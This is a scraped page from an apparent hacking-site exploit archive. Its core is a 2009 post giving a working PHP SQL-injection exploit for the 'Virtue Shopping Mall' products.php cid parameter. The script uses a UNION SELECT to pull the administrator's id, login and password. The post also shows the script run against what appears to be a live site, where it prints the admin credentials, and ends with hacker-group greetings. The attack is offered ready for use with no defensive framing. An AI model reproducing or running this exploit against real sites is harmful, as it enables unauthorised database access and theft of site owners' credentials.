Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
MyBulletinBoard (MyBB)
Joomla Component com_con
deV!Lz Clanportal [DZCP]
Discuz! 6.0.1 (searchid)
Boonex Dolphin 6.1.2 Mul
AuraCMS
pmaPWN! - phpMyAdmin Cod
SMF Mod Member Awards 1.
WarFTP 1.65 (USER) Remot
CMailServer 5.4.6 (CMail
VIVOTEK and NUUO Team Up
Mozilla Firefox 3.5 (Fon
OllyDBG v1.10 and ImpREC
Joomla Component com_con
BoonEx Ray 3.5 (sIncPath
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
ARM ifconfig eth0 and As
HP Data Protector Media
Winamp 5.5.8 (in_mod plu
Hanso Converter 1.1.0 .o
Fat Player Media Player
Comet Bird 3.6.10 Crash
PHP Hosting Directory 2.
MySQl 5.1 DLL Hijacking
Opera Denial of Service
Multiple Buffer Overflow
Postcard Mentor - Databa
Catalog Manager Database
My Vacation Tracker DLL
Microsoft Internet Explo
linux/x86 setreuid(0,0)
Virtue Shopping Mall (cid) Remote SQL Injection Vulnerability
  Add date: 06/13/2009   Publishing date: 06/13/2009   Hits: 7 
CMS : Virtue Shopping Mall
WEB  : http://www.virtuenetz.com/mall/
Archivo : products.php
Variable Tipo : GET
valor : cid
Tipo : SQL Injection
URL : http://www.site.com/products.php?cid=[SQLI]

Exploit :
<?
$web  = $argv[1];
$url = $web."/products.php?cid=8+and+1=0+union+select+all+concat(0x756E646572,id,0x3A,login,0x3A,password,0x736563)+from+admin+limit+0,1";
preg_match_all("/under(.*)sec/",file_get_contents($url),$salida, PREG_PATTERN_ORDER);
$info = explode(":",$salida[1][0]);
echo "ID :".$info[0]."\n";
echo "Usuario : ".$info[1]."\n";
echo "Password : ".$info[2]."\n";
?>


undersec@Undersec:~/Escritorio$ php exploit.php http://www.virtuenetz.com/mall/

ID :1
Usuario : admin
Password : admin

Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.

100% CHILE
WWW.UNDERSECURITY.NET

# [2009-06-08]
Prev:Virtue Book Store (cid) Remote SQL Injection Vulnerability Next:LightNEasy sql/no-db

Comment:

Category: Home > Exploit
Home